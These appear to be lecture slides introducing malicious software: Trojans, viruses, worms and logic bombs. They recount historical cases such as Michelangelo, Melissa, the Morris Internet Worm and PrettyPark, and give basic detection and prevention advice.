Malicious Software

Lesson 16

Malicious Software

• Trojan Horses• A program that appears to do one thing (and may indeed do it) but

that hides something else.

• Viruses• a program that reproduces by attaching copies of itself to other

programs, often carries a malicious “payload”

• Worms• Does not need to attach itself to another program to reproduce,

attempts to gain access to other systems on a network and then copies itself to these new systems

• Time (logic) bombs• a program that is set to execute it’s payload upon a certain condition

being met.

Trojan Horse

• Gets its name from the Trojan Horse of Antiquity

• Commonly found with programs that sound “interesting” so folks will run them

• Requires that the program they are attached to is executed.

• Does not refer to just software• Trojan ATM installed to collect pin numbers

• Earliest versions were probably login Trojans

Back Orifice & BO2K

• Originally released by cDc on 3 August 1998. It has reportedly been downloaded by 100,000’s of people since then.

• It gives "system admin" type privileges to a remote user by way of the computer's Internet link.

• Back Orifice can arrive disguised as a component of practically any software installation. It can be attached to other files or programs or run on its own.

• To the user installing an "infected" application, it will appear that all went normally.

• For BO2K see www.bo2k.com

Trojans: Detection and Prevention

• Often you won’t know until something bad happens.

• Only run software you can trust.• Install a virus checking program.• Use hashing/checksum type utility to

periodically check integrity of system routines.

• And don’t forget Easter Eggs

Viruses

• MUST attach itself to another program.

• Usually contains a nefarious code segment which may not be immediately noticed.

• Three major types• Program

• boot

• macro

Viruses World Wide

Viruses World-wide

Some details about the virus

Viruses, some history

• Fred Cohen formalized the concept (as we know it today) as a Ph.D. student at USC in the early 1980’s. Published his dissertation while a professor at the University of Leigh in 1984.

• Apple was first (1981) to see what today might be called a virus but it was benign.

• First DOS virus was created at the Univ. of Leigh and was thus called the Leigh virus.• A counter inside the virus incremented by 1 each infection• When the counter reached four, the virus overwrote the FAT and boot

sector with garbage, essentially destroying all data on the disk.• It infected .COM files and added 555 bytes to the command.com file.• Author of virus never determined.

Viruses, some more history

• Next virus was the Brain virus.• Probably written before the Leigh virus but reported later.• Authors not hard to find because they included their names, address, and a small

commercial inside the virus.• Writers from Pakistan.• A floppy-only boot sector virus.

• Only invoked if machine booted from an infected disk.

• Wrote to six other sectors then marked them as “bad”• Changed the volume label to “© Brain”, thus the name (Brain was the name of

the company in the advertisement).• Had some stealth techniques as any request to read the boot sector once infected

would be directed to a copy of the original so it showed no infection.• Carried no malicious payload, only the advertisement.• A variation was created to “punish” Americans involved in SW piracy.

Viruses, the continuing saga...• Up until 1987-1988 viruses were actually fairly rare. A couple of new

viruses changed all of that.• Jerusalem (aka Israel, Hebrew University, Friday the 13th, 1813, PLO)

• first isolated at Hebrew University in Israel in 1987 (though some believe it actually originated somewhere in Italy).

• A .COM and .EXE infector, added 1813 bytes to COM files and 1808 to EXE.• Did not properly check for infection so kept reinfecting files (thus continually adding to

their size -- a tipoff that something was up).• Carried a payload which deleted files on Friday the 13th• spawned many copy-cat viruses

• Stoned• infected the master boot record (MBR) on a hard disk and the boot sector on a floppy disk• Displayed message “Your PC is now Stoned!”

• Michelangelo• Discovered in 1991• floppy diskette Boot Sector and hard disk Partition/MBR infector

Michelangelo is a floppy diskette Boot Sector and hard disk Partition/MBR infector, and became fairly widespread after being discovered in April, 1991. It is potentially destructive, since variants will destroy data on the hard disk, and on floppies, on March 6 as well as other dates.

If an infected diskette is in A> drive at boot-up, its Boot Sector (Sector 0) which contains the virus program will be read into memory. The virus then takes control of the system, and infects the hard disk when the boot-up is completed, copying its code to (cylinder&head 0, sector 1), moving Partition/MBR data to (cylinder&head 0, sector 7).

Ordinarily, data are not lost from the hard disk from that alone, because DOS does not use the sector that the virus uses. However, if that sector isused by third-party software to store data, during formatting, or for password access, or by drivers to access large partitions, problems can result.

In its original form, Michelangelo was 480 bytes long, would not infect disks in B> drive, and moves Interrupt 12's return, denying use of memory between 638K and 640K to DOS, where the virus is resident. Thus CHKDSK will show 653312 total bytes memory, instead of 655360.

The virus monitors Interrupt 13, and any DOS use of that to read/write (even the DIR command) triggers the virus to infect disks in A>, if not they are not already infected, or write-protected.

It moves the diskette's original Boot record code to the area used by the Directory, and if the disk has files listed in the overwritten sector, this will cause the loss of entries of files, deleted files, and sub-directories in the root.

The files could still be located in the file storage area of the disk, and could be recovered using a utility program, but since they are no longer listed in the Directory, they may be overwritten, as other files are later stored on the diskette.

For its destructive phase, the virus checks the system date only when the PC is booted from an infected disk. (It thus can never activate on an XT, which boots with the 01-01-80 date.) Otherwise, it will cause data loss on the specific date the particular variant uses.

If it is thus triggered, Michelangelo begins overwriting at the start of the disk (where the Partition/MBR, Boot, File Allocation Tables, and Directory data are stored). After the user realizes that something is wrong, turns power off, and re-boots from a floppy, trying to access the hard disk results only in the message Invalid Drive Specification. At that point, exactly how much data were lost depends on how long it took to turn the power off. If the power is turned off quickly enough, the virus can be prevented from completing its job. Files located beyond the point at which the overwriting stopped (especially D: E: drives, if they existed) would still remain.

Viruses, more on Michelangelo

Program viruses

• Contaminates files that contain computer code, especially .EXE and .COM files but also .SYS and .DLL.

• About 85% of viruses (at one time) were program viruses.

Boot Viruses

• Computer operating systems typically set aside a portion of each disk for code to boot the computer. Under DOS, this section is called a boot sector on floppies or a master boot record (MBR) for hard disks.

• Boot Viruses (or System infectors) store themselves in this area and hence are invoked whenever the disk is used to boot the system.

Macro Viruses

• Manifested in an auto-exec macro embedded in document files of applications with a macro capability• e.g. word processors, spreadsheets

• First one detected was the Concept virus that infected Microsoft Word document files.• Detected in July 1995, by the fall it was the most

frequently reported virus.

• Since the Concept virus, numerous macro viruses have been created.

Macro Viruses, some examples

• FormatC -- (1997) deleted files on the hard disk• Wazzu -- (1997) randomly moves up to 3 words in a

document or else inserted the word Wazzu.• WM/PolyPoster -- (1998) tries to post the user’s Word

documents on public newsgroups such as alt.hacker, alt.2600, and alt.sex.

• ShareFun -- (1998) infects the global template so all documents will be infected, then 1 out of 4 times it will try to send an infected file to three random email addresses in the user’s mail list.

Macro viruses : Melissa

• Infects Word 97 and Word 2000 on Windows-based machines (Windows 95, Windows 98, and Windows NT).

• Spread by means of a specially-crafted e-mail message from someone who's been infected.• Subject line reads:

• Subject: Important Message From name of infected user

• contains a line that reads:• Here is that document you asked for ... don't show anyone else ;-)

• contains an attachment named LIST.DOC, which is an infected Word document.

Melissa (cont.)• Each time an infected document is opened, the virus:

• lowers macro security settings (Tools-Macro in Word 97 or Macro-Security in Word 2000) so as to permit macros to automatically run without warnings whenever documents are opened in the future.

• It then checks to see if the registry key HKEY_Current_User\Software\Microsoft\Office\Melissa? has the value ... by Kwyjibo.

• If it does not, or does not exist, the virus looks for an installed copy of Microsoft Outlook (not Outlook Express) and uses that to send copies of itself in the name of the infected user to up to 50 addresses in any Outlook address book available to the user.

• attaches itself to the normal.dot default template file, thereby allowing itself to propagate to arbitrary Word documents as they are opened.

• Carries a destructive payload triggered when opening or closing a document if the current number of minutes matches the current day of the month (eg, at 11:29 on March 29th). If so, the following text is inserted in the document:

• “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”

Virus Characteristics

• Stealth• Viruses to some degree all attempt to conceal

their presence in order to maximize their chance of spreading.

• Polymorphism• Viruses that attach an evolved copy of

themselves to the new host instead of making an exact copy.

• They “morph”

Detection of and Protection against Viruses

• Usually you won’t know until something bad happens.

• Don’t run programs you can’t trust.• Shrinkwrap is not always a guarantee

• Install a virus checking program• update it frequently

• Backup, backup, backup

Anti-Virus packages

Virus hoaxes

Worms• “Program that propagates from one computer to

another over a network by breaking into the computers in much the way that a hacker would break into them.” To do this they• Need to find a machine• break into it• make a copy of itself on the new machine

• Like viruses, may or may not contain a destructive payload.

• Hybrid viruses/worms now exist

The Internet Worm

• Took advantage of flaws in standard UNIX SW• fingerd

• gets buffer overflow

• sendmail• bug in debug option that allowed remote cmnd execution

• password guessing• anybody could access encrypted password file

• Also simply attempted to take advantage of trusted relationships using rsh

The Internet Worm• Two parts

• Main program• collect information on other systems on network

• attempt penetration of these systems to send bootstrap pgm

• bootstrap program• small (99 lines) C program

• would attempt to copy main worm on system and run it

• Made some attempts to hide itself• would delete its own files as soon as it was running

• if a failure occurred, it deleted itself

The dictionary used by the Worm

Why did it cause so much damage?

• There was no damaging payload• Systems had problems simply because there

were too many copies of the worm running on them.• There was a check to see if a system was

already infected, but 1 out of every 7 times it would ignore this check.

• Copies of worms marked for deletion still made one pass through the password file.

The fate of RTM• Robert T. Morris, the author of the Internet Worm program,

was convicted of a Federal felony in the case. The law involved was 18 USC 1030 (A)(5)(a), the Computer Crime and Abuse Act of 1986. He was found guilty in February of 1990 in US District Court in Syracuse, NY.

• In May of 1990, he was sentenced -- outside of Federal sentencing guidelines -- to 3 years of probation, 400 hours of community service, and $10,050 in fines plus probation costs. His lawyers appealed the conviction to the Circuit Court of Appeals, and the conviction was upheld. His lawyers then appealed to the Supreme Court, but the Court declined to hear the case -- leaving the conviction intact.

Hybrid viruses/worms

• CHRISTMA.EXEC• December 1987, two German university students

• Spread via email messages

• when email message read, recipient told to type Christmas– started a program which displayed a Christmas tree

– then searched for the e-mail addresses of other users who had sent mail to or received mail from user and mailed a copy to them

• spread to 130 countries, was not intended to do any harm.

• Called a worm because it does not attach itself to another program.

Hybrid viruses/worms• PrettyPark

• infects Windows 9x/NT files.• arrives via email from infected users entitled C:\CoolProgs\Pretty Park.exe and

containing the text “Test: Pretty Park.exe :)”. May display an icon of a character from the animated comedy series "Southpark".

• Attached is a program named Pretty Park.exe or Pretty~1.exe, which contains the worm's payload.

• When a user opens this program, the worm runs itself as a hidden application in Windows, copies itself to the Windows System directory as FILES32.VXD, and registers that program to run each time another application starts. Then, it mails itself every 30 minutes to each address in the user's address book using either Outlook or Outlook Express.

• A second function is to connect to an IRC server and join a specific IRC channel. While connected, this worm tries to stay connected by sending information to the IRC server, and will also retrieve any commands from the IRC channel. While on the IRC server, the author of this worm could use the connection as a remote access trojan in order to get info such as the computer name, registered owner, registered organization, system root path, and Dial Up Networking username and passwords.

Worms: Detection and Prevention

• For Hybrid ones in email, don’t run a program unless you are sure of its source and integrity.• If in doubt

• contact the sender• download to a disk and run on an isolated system first

• For network worms, protection takes the same form as protecting the network -- install patches and secure the system the same way you would to keep human intruders out.

• Often you will not detect a worm until after a problem• may want to periodically check and routinely monitor system files

-- especially any attempts to modify them.

Time/Logic Bombs

• Can be Trojan or stand-alone program.• Designed to invoke its payload upon a certain

condition being met.• Time bomb: at a specific time/date• Logic bomb: should a certain condition be true

• Timothy Lloyd and Omega engineering• 20 days after his dismissal a logic bomb deleted all of

Omega’s design and production programs—tens of millions lost

• USPA/IRA• after employee fired, 186,000 client records deleted

Time/Logic Bombs: Prevention and Detection

• Often very hard to detect until too late (i.e. until after it is activated).

• Will generally be the work of an insider• this means they have access that will complicate finding this

type of malicious software.• Check programs set to always run or run upon startup

• Prosecute if it happens• won’t save you but may discourage the next individual from

trying it.

• Backup, backup, backup